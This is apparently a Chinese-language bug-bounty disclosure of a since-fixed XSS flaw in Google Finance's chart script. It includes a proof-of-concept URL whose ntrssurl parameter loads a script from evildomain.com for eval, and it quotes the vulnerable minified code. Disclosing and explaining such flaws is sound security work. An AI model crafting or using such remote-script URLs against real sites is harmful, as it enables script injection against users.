这个问题出现在Google Finance中(google.com/finance)。它能欺骗Javascript的走势图应用（源文件为/finance/f/sfe-opt.js)，让其载入一个托管在外部域上的文件，然后通过eval()方法将该文件内容转换成Javascript代码并执行。

这个过程不需要用户交互，只要点击一下URL就可以了。

复现步骤：

1）点击该URL（目前已修复）：

https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

文件x.js包含下列验证代码用来演示:

2）远程Javascript被执行。

工作原理

以下是 /finance/f/sfe-opt.js中的两个代码片段，它们引起了这个安全问题。

c.push("ntsp=");
c.push(b);
if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || "")));
return c.join("")

在上面这段代码中，URL参数，更确切的说是ntrssurl参数（用户RSS源的地址）被获取并进行了连接。

Xi.prototype.send = function (a, b, c, d) {
    a = a || null;
    d = d || "_" + (Yi++).toString(36) + x().toString(36);
    n._callbacks_ || (n._callbacks_ = {});
    var e = this.$s.Z();
    if (a)
        for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); 
    b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d));
    b = Wi(e.toString(), {
        timeout: this.We,
        Ns: !0
    });
    Si(b, null, $i(d, a, c), void 0);
    return {
        La: d,
        Du: b
    }
};

第二段代码负责在外部域中查询新闻源以将内容显示在走势图中。

它生成一个回调函数名，以字串 “?_CALLBACK_”结尾。函数Wi对URL中的ntrssurl参数中的域名执行xmlhttprequest操作。

然后，返回了一段简单的Javascript代码，并且通过eval()方法将其执行。

触发XSS漏洞的截图

callback 请求截图

有漏洞的代码片段

这个安全隐患很快就被修复了，我因此得到了5000美元的奖励。

非常感谢，Google安全小组！